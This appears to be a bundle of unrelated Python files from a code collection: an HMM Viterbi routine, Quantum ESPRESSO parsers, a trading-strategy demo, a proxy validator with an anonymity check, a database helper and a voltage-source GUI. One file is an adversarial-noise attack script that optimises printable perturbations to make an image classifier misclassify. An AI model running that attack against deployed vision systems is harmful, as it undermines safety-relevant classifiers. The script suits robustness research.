gamma = vmap(lambda x: log_normalize(x, axis=0)[0])(gamma)
return alpha, beta, gamma, ll
@jit
def hmm_viterbi_log(params, obs_seq, length=None):
'''
    Computes the most likely sequence of hidden states (the Viterbi path) given
    the observations that were made at each time step, i.e.
    argmax_{z} P(z[0], ..., z[num_steps - 1] | x[0], ..., x[num_steps - 1])
It is based on https://github.com/deepmind/distrax/blob/master/distrax/_src/utils/hmm.py
Parameters
----------
params : HMM
Hidden Markov Model
obs_seq: array(seq_len)
History of observed states
Returns
-------
    * array(seq_len,)
        The most likely sequence of hidden states
'''
seq_len = len(obs_seq)
if length is None:
length = seq_len
trans_dist, obs_dist, init_dist = params.trans_dist, params.obs_dist, params.init_dist
trans_log_probs = log_softmax(trans_dist.logits)
init_log_probs = log_softmax(init_dist.logits)
n_states = obs_dist.batch_shape[0]
first_log_prob = init_log_probs + obs_dist.log_prob(obs_seq[0])
if seq_len == 1:
return jnp.expand_dims(jnp.argmax(first_log_prob), axis=0)
def viterbi_forward(prev_logp, t):
obs_logp = obs_dist.log_prob(obs_seq[t])
logp = jnp.where(t <= length,
prev_logp[..., None] + trans_log_probs + obs_logp[..., None, :],
-jnp.inf + jnp.zeros_like(trans_log_probs))
max_logp_given_successor = jnp.where(t <= length, jnp.max(logp, axis=-2), prev_logp)
most_likely_given_successor = jnp.where(t <= length, jnp.argmax(logp, axis=-2), -1)
return max_logp_given_successor, most_likely_given_successor
ts = jnp.arange(1, seq_len)
final_log_prob, most_likely_sources = lax.scan(viterbi_forward, first_log_prob, ts)
most_likely_initial_given_successor = jnp.argmax(
trans_log_probs + first_log_prob, axis=-2)
most_likely_sources = jnp.concatenate([
jnp.expand_dims(most_likely_initial_given_successor, axis=0),
most_likely_sources], axis=0)
def viterbi_backward(state, t):
state = jnp.where(t <= length,
jnp.sum(most_likely_sources[t] * one_hot(state, n_states)).astype(jnp.int64),
state)
most_likely = jnp.where(t <= length, state, -1)
return state, most_likely
final_state = jnp.argmax(final_log_prob)
_, most_likely_path = lax.scan(viterbi_backward, final_state, ts, reverse=True)
final_state = jnp.where(length == seq_len, final_state, -1)
return jnp.append(most_likely_path, final_state)
|
py | 1a4b926977f46de6f98472226aaa5d3b9b4737c2 | '''
Collect results in Quantum ESPRESSO
'''
import sys
import numpy as np
from pymatgen.core import Structure
from . import structure as qe_structure
from ... import utility
from ...IO import pkl_data
from ...IO import read_input as rin
def collect_qe(current_id, work_path):
# ---------- check optimization in previous stage
try:
with open(work_path+rin.qe_outfile, 'r') as fpout:
lines = fpout.readlines()
check_opt = 'not_yet'
for line in lines:
if 'End final coordinates' in line:
check_opt = 'done'
except Exception as e:
print(e)
check_opt = 'no_file'
# ---------- obtain energy and magmom
try:
with open(work_path+rin.qe_outfile, 'r') as fpout:
lines = fpout.readlines()
energy = np.nan
for line in reversed(lines):
if line.startswith('!'):
energy = float(line.split()[-2]) # in Ry
energy = energy * utility.ry2ev / float(rin.natot) # Ry/cell --> eV/atom
break
magmom = np.nan # implemented by H. Sawahata 2020/10/04
for line in reversed(lines):
if line.find("total magnetization") >= 0:
muB = line.split()
magmom = float(muB[3])
break
except Exception as e:
energy = np.nan # error
magmom = np.nan # error
print(e)
print(' Structure ID {0}, could not obtain energy from {1}'.format(
current_id, rin.qe_outfile))
# ---------- collect the last structure
try:
lines_cell = qe_structure.extract_cell_parameters(
work_path+rin.qe_outfile)
if lines_cell is None:
lines_cell = qe_structure.extract_cell_parameters(
work_path+rin.qe_infile)
lines_atom = qe_structure.extract_atomic_positions(
work_path+rin.qe_outfile)
if lines_atom is None:
lines_atom = qe_structure.extract_atomic_positions(
work_path+rin.qe_infile)
opt_struc = qe_structure.from_lines(lines_cell, lines_atom)
# ------ opt_qe-structure
with open('./data/opt_qe-structure', 'a') as fstruc:
fstruc.write('# ID {0:d}\n'.format(current_id))
qe_structure.write(opt_struc, './data/opt_qe-structure', mode='a')
except Exception as e:
print(e)
opt_struc = None
# ---------- check
if np.isnan(energy):
opt_struc = None
if opt_struc is None:
energy = np.nan
magmom = np.nan
# ---------- return
return opt_struc, energy, magmom, check_opt
def get_energy_step_qe(energy_step_data, current_id, work_path):
'''
get energy step data in eV/atom
energy_step_data[ID][stage][step]
energy_step_data[ID][0] <-- stage 1
energy_step_data[ID][1] <-- stage 2
'''
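    # For example (the ID value is illustrative only): energy_step_data[7][0] would be
    # a 1-D numpy array of eV/atom energies, one entry per total-energy ('!') line in
    # the stage-1 pwscf output of structure ID 7.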
try:
# ---------- read output file
with open(work_path+rin.qe_outfile, 'r') as f:
lines = f.readlines()
# ---------- get energy step
energy_step = []
final_flag = False # End final coordinates
vc_flag = False # vc-relax
for line in lines:
if line.startswith('!'):
energy_step.append(line.split()[4])
# ------ check opt and vc-relax
if 'End final coordinates' in line:
final_flag = True
if 'CELL_PARAMETERS' in line:
vc_flag = True
# ------ delete last energy (after End final coordinates)
if final_flag and vc_flag:
energy_step.pop(-1)
# ------ list --> array, Ry/cell --> eV/atom
if not energy_step:
energy_step = None # if empty
print('#### ID: {0}: failed to parse energy_step\n'.format(
current_id), file=sys.stderr)
else:
energy_step = utility.ry2ev / rin.natot * np.array(energy_step,
dtype='float')
except Exception as e:
energy_step = None
print(e, '#### ID: {0}: failed to parse energy_step\n'.format(
current_id), file=sys.stderr)
# ---------- append energy_step
if energy_step_data.get(current_id) is None:
energy_step_data[current_id] = [] # initialize
energy_step_data[current_id].append(energy_step)
# ---------- save energy_step_data
pkl_data.save_energy_step(energy_step_data)
# ---------- return
return energy_step_data
def get_struc_step_qe(struc_step_data, current_id, work_path):
'''
get structure step data
# ---------- args
struc_step_data: (dict) the key is structure ID
struc_step_data[ID][stage][step]
struc_step_data[ID][0] <-- stage 1
struc_step_data[ID][1] <-- stage 2
'''
try:
struc_step = []
# ------ init struc from pwscf.in
_extract_struc_qe(work_path+rin.qe_infile, struc_step)
# ------ struc step from pwscf.out
_extract_struc_qe(work_path+rin.qe_outfile, struc_step)
# ------ delete last structure due to duplication
struc_step.pop(-1)
except Exception as e:
struc_step = None
print(e ,'#### ID: {0}: failed to parse in struc_step\n'.format(
current_id), file=sys.stderr)
# ---------- append struc_step_data
if struc_step_data.get(current_id) is None:
struc_step_data[current_id] = [] # initialize
struc_step_data[current_id].append(struc_step)
# ---------- save struc_step_data
pkl_data.save_struc_step(struc_step_data)
# ---------- return
return struc_step_data
def _extract_struc_qe(filename, struc_step):
# ---------- read a file
with open(filename, 'r') as f:
lines = f.readlines()
# ---------- extract struc
read_cell = False
read_coords = False
vc_flag = False # in case of vc-relax
for line in lines:
# ------ cell part
if read_cell:
lattice.append(line.split())
if len(lattice) == 3:
read_cell = False
lattice = np.array(lattice, dtype='float')
if 'CELL_PARAMETERS' in line:
read_cell = True
vc_flag = True
lattice = []
# ------ coords part
if read_coords:
lsplit = line.split()
species.append(lsplit[0])
coords.append(lsplit[1:])
if len(coords) == rin.natot:
read_coords = False
coords = np.array(coords, dtype='float')
# ---- gen struc
if not vc_flag: # empty lattice, use init lattice
lattice = struc_step[0].lattice
struc = Structure(lattice, species, coords)
struc_step.append(struc)
if 'ATOMIC_POSITIONS' in line:
read_coords = True
species = []
coords = []
def get_force_step_qe(force_step_data, current_id, work_path):
'''
get force step data in eV/angstrom
# ---------- args
force_step_data: (dict) the key is structure ID
force_step_data[ID][stage][step]
force_step_data[ID][0] <-- stage 1
force_step_data[ID][1] <-- stage 2
'''
try:
# ---------- read output file
with open(work_path+rin.qe_outfile, 'r') as f:
lines = f.readlines()
# ---------- get force step
force_step = []
read_force = False
final_flag = False # End final coordinates
vc_flag = False # in case of vc-relax
for line in lines:
if 'atom 1 type 1 force' in line:
read_force = True
force = []
if read_force:
force.append(line.split()[6:])
if len(force) == rin.natot:
read_force = False
force_step.append(utility.ry2ev / utility.bohr2ang * np.array(
force, dtype='float'))
# ------ check opt and vc-relax
if 'End final coordinates' in line:
final_flag = True
if 'CELL_PARAMETERS' in line:
vc_flag = True
        # ------ delete last force (after End final coordinates)
if final_flag and vc_flag:
force_step.pop(-1)
# ------ if empty
if len(force_step) == 0:
force_step = None
print('#### ID: {0}: failed to parse force_step\n'.format(
current_id), file=sys.stderr)
except Exception as e:
force_step = None
print(e, '#### ID: {0}: failed to parse in force_step\n'.format(
current_id), file=sys.stderr)
# ---------- append force_step
if force_step_data.get(current_id) is None:
force_step_data[current_id] = [] # initialize
force_step_data[current_id].append(force_step)
# ---------- save force_step_data
pkl_data.save_force_step(force_step_data)
# ---------- return
return force_step_data
def get_stress_step_qe(stress_step_data, current_id, work_path):
'''
get stress step data in eV/ang**3
# ---------- args
stress_step_data: (dict) the key is structure ID
stress_step_data[ID][stage][step]
stress_step_data[ID][0] <-- stage 1
stress_step_data[ID][1] <-- stage 2
'''
try:
# ---------- read output file
with open(work_path+rin.qe_outfile, 'r') as f:
lines = f.readlines()
# ---------- get stress step
stress_step = []
read_stress = False
final_flag = False # End final coordinates
vc_flag = False # in case of vc-relax
for line in lines:
if read_stress:
stress.append(line.split()[3:])
if len(stress) == 3:
read_stress = False
stress_step.append(utility.kbar2ev_ang3 * np.array(
stress, dtype='float'))
if 'total stress (Ry/bohr**3)' in line:
read_stress = True
stress = []
# ------ check opt and vc-relax
if 'End final coordinates' in line:
final_flag = True
if 'CELL_PARAMETERS' in line:
vc_flag = True
        # ------ delete last stress (after End final coordinates)
if final_flag and vc_flag:
stress_step.pop(-1)
# ------ if empty
if len(stress_step) == 0:
stress_step = None
print('#### ID: {0}: failed to parse stress_step\n'.format(
current_id), file=sys.stderr)
except Exception as e:
stress_step = None
print(e, '#### ID: {0}: failed to parse in stress_step\n'.format(
current_id), file=sys.stderr)
# ---------- append stress_step
if stress_step_data.get(current_id) is None:
stress_step_data[current_id] = [] # initialize
stress_step_data[current_id].append(stress_step)
# ---------- save stress_step_data
pkl_data.save_stress_step(stress_step_data)
# ---------- return
return stress_step_data
|
py | 1a4b93997c9dc7234dfbc61090bb1920eda5c2ce | '''
Generates noise using multiple images with the Adam optimizer method.
This script DOES use the inverse mask.
'''
from utils import get_adv_target, load_norm_mask, setup_attack_graph, report_extreme_values, load_many_images, get_print_triplets
import keras
import tensorflow as tf
from tensorflow.python.platform import app
from tensorflow.python.platform import flags
import os
import numpy as np
import cv2
from cleverhans.utils_tf import model_loss
from scipy.misc import imread, imsave
import sys
import math
#set parameters for attack
FLAGS = flags.FLAGS
def main(argv=None):
print("going into setup")
op, model, sess, pholders, varops = setup_attack_graph()
data = load_many_images(FLAGS.attack_srcdir)
num_images = len(data)
feed_dict = {pholders['image_in']: data,
pholders['attack_target']: get_adv_target(nb_inputs = num_images),
pholders['noise_mask']: load_norm_mask(),
keras.backend.learning_phase(): 0}
if FLAGS.printability_optimization:
feed_dict[pholders['printable_colors']] = get_print_triplets(FLAGS.printability_tuples)
# used to save checkpoints after each epoch
saver = tf.train.Saver(max_to_keep=50)
# debug: sanity check to make sure the model isn't being adjusted
# i.e. this should stay constant
if FLAGS.fullres_input:
clean_model_loss = model_loss(pholders['attack_target'], model(tf.image.resize_images(pholders['image_in'], (FLAGS.img_rows,FLAGS.img_cols))), mean=True)
else:
clean_model_loss = model_loss(pholders['attack_target'], model(pholders['image_in']), mean=True)
for i in range(FLAGS.attack_epochs):
print('Epoch %d'%i),
sys.stdout.flush()
if not FLAGS.fullres_input:
_, train_loss, noisy_in, clean_loss, clean_classes, noisy_classes = sess.run( \
(op, \
varops['adv_loss'], \
varops['noise_inputs'], \
clean_model_loss, \
model(pholders['image_in']), \
varops['adv_pred']) \
, feed_dict=feed_dict)
else:
_, train_loss, noisy_in, clean_loss, clean_classes, noisy_classes, rnin = sess.run( \
(op, \
varops['adv_loss'], \
varops['noise_inputs'], \
clean_model_loss, \
model(tf.image.resize_images(pholders['image_in'], (FLAGS.img_rows,FLAGS.img_cols))), \
varops['adv_pred'], \
varops['resized_noise_in']) \
, feed_dict=feed_dict)
print(model(tf.image.resize_images(pholders['image_in'], (FLAGS.img_rows,FLAGS.img_cols))))
print("adversarial loss %.5f model loss on clean img: %.5f"%(train_loss, clean_loss)),
sys.stdout.flush()
if FLAGS.printability_optimization:
print("noise NPS %.5f"%sess.run(varops['printer_error'], feed_dict=feed_dict)),
# num_misclassified = 0
# for j in range(num_images):
# clean_classification = np.argmax(clean_classes[j])
# noise_classification = np.argmax(noisy_classes[j])
# if clean_classification != noise_classification:
# num_misclassified += 1
# proportion_misclassified = float(num_misclassified)/float(num_images)
# print('percent misclassified images %.1f'%(proportion_misclassified*100.0))
# if i%FLAGS.save_frequency == 0 or proportion_misclassified > 0.9:
# saver.save(sess, os.path.join('optimization_output', FLAGS.checkpoint, 'model', FLAGS.checkpoint), global_step=i)
# imsave(os.path.join('optimization_output', FLAGS.checkpoint, "noisy_images", "noisyimg_%s_epoch_%d.png"%(FLAGS.checkpoint,i)), (noisy_in[0]*255).astype(int))
# if FLAGS.fullres_input:
# imsave(os.path.join('optimization_output', FLAGS.checkpoint, "nimage_downsized_%d.png"%i), rnin[0])
# imsave(os.path.join('optimization_output', FLAGS.checkpoint, "noise_downsized_%d.png"%i),sess.run(varops['noise']))
print()
### end of epoch
sess.close()
for i in range(num_images):
imsave(os.path.join('optimization_output', FLAGS.checkpoint, "noisy-set", "%d.png"%(i)), (noisy_in[i]*255).astype(int))
if __name__ == '__main__':
app.run()
|
py | 1a4b93e1e04d0f803bc3a8a285242f892995b7b5 | # encoding: UTF-8
from vnpy.trader.app.optionMaster.omStrategy import OmStrategyTemplate
########################################################################
class DemoStrategy(OmStrategyTemplate):
"""演示策略"""
className = 'DemoStrategy'
author = u'用Python的交易员'
temp = 123
    # Parameter list, holding the names of the parameters
paramList = ['name',
'className',
'author',
'vtSymbols',
'temp']
    # Variable list, holding the names of the variables
varList = ['inited',
'trading']
#----------------------------------------------------------------------
def __init__(self, engine, setting):
"""Constructor"""
super(DemoStrategy, self).__init__(engine, setting)
#----------------------------------------------------------------------
def onInit(self):
"""初始化"""
self.writeLog(u'%s策略初始化' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onStart(self):
"""启动"""
self.writeLog(u'%s策略启动' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onStop(self):
"""停止"""
self.writeLog(u'%s策略停止' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onTick(self, tick):
"""行情推送"""
self.writeLog(u'%s策略收到行情推送' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onTrade(self, trade):
"""成交推送"""
self.writeLog(u'%s策略收到成交推送' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onOrder(self, order):
"""委托推送"""
self.writeLog(u'%s策略收到委托推送' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onTimer(self):
"""定时推送"""
self.writeLog(u'%s策略收到定时推送,自定义参数%s' %(self.name, self.temp))
|
py | 1a4b94567c32707bf318eaf906d290d42d4aaabd | '''
@Author: [email protected]
@Date: 2020-03-01 18:33:41
@LastEditors: [email protected]
@LastEditTime: 2020-03-10 19:51:30
@Description: Proxy validator
'''
import os
import requests
import asyncio
import time
import json
import ssl
from GeeProxy.utils.logger import proxy_validator
from aiohttp import ClientSession, ClientTimeout, ClientError, ClientSSLError
from aiohttp.client_exceptions import ClientHttpProxyError
from aiohttp_proxy import ProxyConnector
from GeeProxy.settings import VAILDATORS_TIMEOUT,\
VAILDATORS_RETRY, PROXY_REQUEST_DELAY, PUBLIC_IP,\
ANONYMOUS_CHECK_API
from GeeProxy.utils.user_agent import UserAgent
class AiohttpSingleton(ClientSession):
'''
    This is an aiohttp ClientSession singleton client class (one instance per process)
'''
def __new__(cls, *args, **keywords):
pid = os.getpid()
if not hasattr(cls, '_instance') or pid != cls._pid:
print("Aiohttp PID is {} and father PID is {}".format(
os.getpid(), os.getppid()))
if hasattr(cls, "_pid"):
print("Aiohttp Instance PID is {} and PID is {}".format(
cls._pid, pid))
cls._instance = ClientSession(*args, **keywords)
cls._pid = os.getpid()
return cls._instance
    @property
    def connector(self):
        return self._instance._connector

    @connector.setter
    def connector(self, connector):
        # replace the connector of the shared ClientSession instance
        self._instance._connector = connector
class ValidateResult:
"""
    Validation result
"""
def __init__(self, proxy=None, web_key=None, delay=-1, dst=None, useful=1):
"""
        :param proxy: proxy address
        :param web_key: cache key
        :param delay: request latency
        :param dst: target site
        :param useful: whether the proxy is usable
"""
        # proxy address
self.proxy = proxy
        # cache key
self.web_key = web_key
        # request latency
self.delay = delay
        # target site
self.dst = dst
        # whether the proxy is anonymous
        # self.anonymous = anonymous
        # whether the proxy is usable
self.available = useful
class ProxyValidator:
"""
    Asynchronous proxy validator. Validation works as follows: the target site is
    requested through the proxy; on timeout the request is retried, and once the retry
    count exceeds the given threshold a still-failing proxy is considered unusable.
    The request latency is measured along the way.
"""
def __init__(self):
self._retry = 0
self._timeout = ClientTimeout(total=VAILDATORS_TIMEOUT)
self._ua = UserAgent()
self._result = {}
async def check_proxy(self, proxy: str, dst: str, web_key: str) -> ValidateResult:
"""
        Check the availability of a proxy
        :param proxy: the proxy to be validated
        :param dst: URL of the target site
        :param web_key: cache key of the target site
        :return: validation result
"""
result = ValidateResult(proxy=proxy, delay=-1, web_key=web_key, dst=dst, useful=1)
time_start = time.time()
try:
            # enable the proxy
connector = ProxyConnector(verify_ssl=False).from_url(proxy)
requests.urllib3.disable_warnings()
            # asynchronous http request
async with ClientSession(connector=connector,
timeout=self._timeout) as session:
params = {
"url": dst,
"verify_ssl": False,
"timeout": self._timeout,
"headers": {
"User-Agent": self._ua.random()
}
}
# verify_ssl = False
if "https" in proxy.split(":"):
params["verify_ssl"] = False
                # asynchronous http request
async with session.get(**params) as response:
proxy_validator.info(
"wait proxy {} for {} response".format(proxy, dst))
await response.text()
await session.close()
time_end = time.time()
delay = time_end - time_start
proxy_validator.info(
"check proxy {} for {} success cost {} s".format(
proxy, dst, delay))
result.delay = delay
result.available = 1
                # a request slower than the delay threshold marks the proxy as unusable
if delay > PROXY_REQUEST_DELAY:
result.available = 0
return result
except (BaseException, asyncio.TimeoutError, ClientError,
ClientHttpProxyError, ClientSSLError) as e:
err_msg = e
if isinstance(e, asyncio.TimeoutError) or isinstance(
e, ClientHttpProxyError):
err_msg = "Http request timeout"
if not isinstance(e, ClientSSLError) or not isinstance(
e, ssl.SSLError):
result.available = 0
            # retry
if self._retry <= VAILDATORS_RETRY:
                # if the retry count is below the threshold, try once more
self._retry = self._retry + 1
result = await self.check_proxy(proxy, dst, web_key)
return result
time_end = time.time()
proxy_validator.error("check proxy {} {} times fail for {} "
"and cost {} s".format(proxy, self._retry, dst, time_end - time_start))
proxy_validator.error("check proxy {} for {} "
"error:{} type {}".format(proxy, dst, err_msg, type(e)))
self._retry = 0
result.delay = time_end - time_start
return result
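    # A minimal driver sketch (comment only; the proxy address, target URL and cache
    # key below are placeholders, not values used by this project):
    #   validator = ProxyValidator()
    #   result = asyncio.get_event_loop().run_until_complete(
    #       validator.check_proxy("http://127.0.0.1:8080",
    #                             "https://www.example.com", "example"))
    #   print(result.available, result.delay)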
@staticmethod
async def check_anonymous(proxy: str) -> bool:
"""
        Check the anonymity level of a proxy
        :param proxy: the proxy to be checked
        :return: True if the proxy is a high-anonymity (elite) proxy
"""
anonymous = True
try:
connector = ProxyConnector.from_url(proxy)
requests.urllib3.disable_warnings()
ua = UserAgent()
async with ClientSession(connector=connector, timeout=5) as session:
            # asynchronous http request
async with session.get(ANONYMOUS_CHECK_API,
ssl=False,
headers={"User-Agent": ua.random()},
timeout=5) as response:
res = await response.text()
res = json.loads(res)
anonymous = ProxyValidator.is_anonymous(res)
if anonymous:
proxy_validator.info("The proxy {} is anonymous".format(proxy))
await session.close()
return anonymous
except Exception as e:
proxy_validator.error("Checking proxy {} anonymous "
"has an error:{} type {}".format(proxy, str(e), type(e)))
raise ClientError("check anonymous")
@staticmethod
def is_anonymous(response: dict) -> bool:
"""
        Judge the anonymity level of the current proxy from the check API response
        :param response: response of the anonymity check api
        :return: True if the proxy is a high-anonymity (elite) proxy
"""
origin = response["origin"]
proxy_connection = response.get("Proxy-Connection", "")
proxy_validator.info(
"Checking anonymous proxy response is {}".format(response))
if origin != PUBLIC_IP and not proxy_connection:
return True
return False
|
py | 1a4b94598b18d36d49078e427ec12454997a5ba3 | # Copyright 2015 Tesora Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from trove.tests.scenario.helpers.mysql_helper import MysqlHelper
class MariadbHelper(MysqlHelper):
def __init__(self, expected_override_name):
super(MariadbHelper, self).__init__(expected_override_name)
|
py | 1a4b94d7404d252510fa119d965886891d164418 | from functools import partial
from pubsub import pub
from threading import Thread
from time import sleep
import wx
from wx.lib.agw.floatspin import FloatSpin
from spacq.gui.tool.box import load_csv, save_csv, Dialog, MessageDialog
from spacq.interface.units import Quantity
"""
Configuration for a ch4VoltageSource.
"""
class ch4VoltageSourceTunerDialog(Dialog):
"""
A dialog for tuning a voltage source port.
"""
def __init__(self, parent, global_store, ok_callback, port, *args, **kwargs):
Dialog.__init__(self, parent, title='Port {0} tuning'.format(port.num))
self.global_store = global_store
self.ok_callback = ok_callback
self.port = port
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Self-calibration.
calibration_static_box = wx.StaticBox(self, label='DAC self-calibration')
calibration_box = wx.StaticBoxSizer(calibration_static_box, wx.VERTICAL)
dialog_box.Add(calibration_box, flag=wx.EXPAND|wx.ALL, border=5)
self.calibrate_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrate, self.calibrate_button)
calibration_box.Add(self.calibrate_button, flag=wx.EXPAND)
## Tuning.
tuning_static_box = wx.StaticBox(self, label='Tuning')
tuning_box = wx.StaticBoxSizer(tuning_static_box, wx.VERTICAL)
dialog_box.Add(tuning_box, flag=wx.EXPAND)
### Autotune.
autotuning_static_box = wx.StaticBox(self, label='Autotuning')
autotuning_box = wx.StaticBoxSizer(autotuning_static_box, wx.VERTICAL)
tuning_box.Add(autotuning_box, flag=wx.EXPAND|wx.ALL, border=5)
autotuning_sizer = wx.FlexGridSizer(rows=3, cols=2, hgap=5)
autotuning_box.Add(autotuning_sizer, flag=wx.CENTER)
autotuning_sizer.Add(wx.StaticText(self, label='Resource name:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.resource_name_input = wx.TextCtrl(self, size=(300,-1))
autotuning_sizer.Add(self.resource_name_input)
autotuning_sizer.Add(wx.StaticText(self, label='Max:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automax_input = FloatSpin(self, value=1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automax_input)
autotuning_sizer.Add(wx.StaticText(self, label='Min:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automin_input = FloatSpin(self, value=-1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automin_input)
self.autotune_button = wx.Button(self, label='Autotune')
self.Bind(wx.EVT_BUTTON, self.OnAutotune, self.autotune_button)
autotuning_box.Add(self.autotune_button, flag=wx.EXPAND)
### Manual tune.
tuning_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=5)
tuning_box.Add(tuning_sizer, flag=wx.CENTER)
tuning_sizer.Add(wx.StaticText(self, label='Gain:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.gain_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.gain_input)
tuning_sizer.Add(wx.StaticText(self, label='Offset:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.offset_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.offset_input)
## End buttons.
button_box = wx.BoxSizer(wx.HORIZONTAL)
dialog_box.Add(button_box, flag=wx.CENTER|wx.ALL, border=5)
ok_button = wx.Button(self, wx.ID_OK)
self.Bind(wx.EVT_BUTTON, self.OnOk, ok_button)
button_box.Add(ok_button)
cancel_button = wx.Button(self, wx.ID_CANCEL)
button_box.Add(cancel_button)
self.SetSizerAndFit(dialog_box)
def autotune(self, resource):
gain, offset = self.port.autotune(resource, set_result=False,
min_value=self.automin_input.GetValue(),
max_value=self.automax_input.GetValue())
wx.CallAfter(self.gain_input.SetValue, gain)
wx.CallAfter(self.offset_input.SetValue, offset)
wx.CallAfter(self.autotune_button.Enable)
def self_calbrate(self):
self.port.apply_settings(calibrate=True)
sleep(self.port.calibration_delay)
wx.CallAfter(self.calibrate_button.Enable)
def SetValue(self, gain, offset):
self.gain_input.SetValue(gain)
self.offset_input.SetValue(offset)
def GetValue(self):
return (self.gain_input.GetValue(), self.offset_input.GetValue())
def OnAutotune(self, evt=None):
name = self.resource_name_input.Value
if not name:
MessageDialog(self, 'No resource provided').Show()
return
try:
resource = self.global_store.resources[name]
except KeyError:
MessageDialog(self, name, 'Missing resource').Show()
return
if not resource.readable:
MessageDialog(self, name, 'Unreadable resource').Show()
return
self.autotune_button.Disable()
thr = Thread(target=self.autotune, args=(resource,))
thr.daemon = True
thr.start()
def OnCalibrate(self, evt=None):
self.calibrate_button.Disable()
thr = Thread(target=self.self_calbrate)
thr.daemon = True
thr.start()
def OnOk(self, evt=None):
self.ok_callback(self)
self.Destroy()
class ch4VoltageSourceSettingsPanel(wx.Panel):
"""
All the settings for a voltage source.
"""
def __init__(self, parent, global_store, vsrc, *args, **kwargs):
wx.Panel.__init__(self, parent, *args, **kwargs)
self.global_store = global_store
self.vsrc = vsrc
self.port_value_inputs = []
self.port_buttons = []
# Panel.
panel_box = wx.BoxSizer(wx.VERTICAL)
## Ports.
ports_box = wx.FlexGridSizer(rows=3, cols=2)
panel_box.Add(ports_box)
for port in range(4):
port_static_box = wx.StaticBox(self, label='Port {0} '.format(port))
port_box = wx.StaticBoxSizer(port_static_box, wx.HORIZONTAL)
ports_box.Add(port_box, flag=wx.ALL, border=5)
spin = FloatSpin(self, value=0, min_val=-10, max_val=10, increment=1, digits=6)
self.port_value_inputs.append(spin)
port_box.Add(spin)
port_box.Add(wx.StaticText(self, label='V'))
set_button = wx.Button(self, label='Set', style=wx.BU_EXACTFIT)
set_button.Bind(wx.EVT_BUTTON, partial(self.OnSetVoltage, port))
port_box.Add(set_button)
tune_button = wx.Button(self, label='Tune...', style=wx.BU_EXACTFIT)
tune_button.Bind(wx.EVT_BUTTON, partial(self.OnTune, port))
port_box.Add(tune_button)
self.port_buttons.append((set_button, tune_button))
## All ports.
button_static_box = wx.StaticBox(self, label='All ports')
button_box = wx.StaticBoxSizer(button_static_box, wx.HORIZONTAL)
panel_box.Add(button_box, flag=wx.CENTER)
### Zero.
zero_all_button = wx.Button(self, label='Zero')
self.Bind(wx.EVT_BUTTON, self.OnZeroAll, zero_all_button)
button_box.Add(zero_all_button, flag=wx.CENTER)
### Self-calibrate.
self.calibrate_all_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrateAll, self.calibrate_all_button)
button_box.Add(self.calibrate_all_button, flag=wx.CENTER)
### Load tuning.
tuning_data_static_box = wx.StaticBox(self, label='Tuning data')
tuning_data_box = wx.StaticBoxSizer(tuning_data_static_box, wx.HORIZONTAL)
button_box.Add(tuning_data_box)
#### Save.
tuning_data_save_button = wx.Button(self, label='Save...')
self.Bind(wx.EVT_BUTTON, self.OnSave, tuning_data_save_button)
tuning_data_box.Add(tuning_data_save_button)
#### Load.
tuning_data_load_button = wx.Button(self, label='Load...')
self.Bind(wx.EVT_BUTTON, self.OnLoad, tuning_data_load_button)
tuning_data_box.Add(tuning_data_load_button)
self.SetSizer(panel_box)
def self_calbrate_all(self):
delay = 0 # s
for port in self.vsrc.ports:
# Use the largest delay.
if port.calibration_delay > delay:
delay = port.calibration_delay
port.apply_settings(calibrate=True)
sleep(delay)
wx.CallAfter(self.calibrate_all_button.Enable)
def zero_all(self):
for port in self.vsrc.ports:
port.voltage = Quantity(0.0, 'V')
def OnSetVoltage(self, port_num, evt=None):
try:
self.vsrc.ports[port_num].voltage = Quantity(self.port_value_inputs[port_num].GetValue(), 'V')
except ValueError as e:
MessageDialog(self, str(e), 'Invalid value').Show()
def OnTune(self, port_num, evt=None):
port = self.vsrc.ports[port_num]
def ok_callback(dlg):
port.gain, port.offset = dlg.GetValue()
dlg = ch4VoltageSourceTunerDialog(self, self.global_store, ok_callback, port)
dlg.SetValue(port.gain, port.offset)
dlg.Show()
def OnCalibrateAll(self, evt=None):
self.calibrate_all_button.Disable()
thr = Thread(target=self.self_calbrate_all)
thr.daemon = True
thr.start()
def OnZeroAll(self, evt=None):
thr = Thread(target=self.zero_all)
thr.daemon = True
thr.start()
def OnSave(self, evt=None):
values = [[port.gain, port.offset] for port in self.vsrc.ports]
try:
save_csv(self, values)
except IOError as e:
MessageDialog(self, str(e), 'Save error').Show()
return
def OnLoad(self, evt=None):
try:
result = load_csv(self)
if result is None:
return
has_header, values, _ = result
if has_header:
port_values = values[1:]
else:
port_values = values
if len(port_values) != len(self.vsrc.ports):
raise ValueError('Invalid number of ports.')
for i, port_value in enumerate(port_values):
if len(port_value) != 2:
raise ValueError('Invalid number of settings for port {0}.'.format(i))
try:
float(port_value[0])
float(port_value[1])
except TypeError:
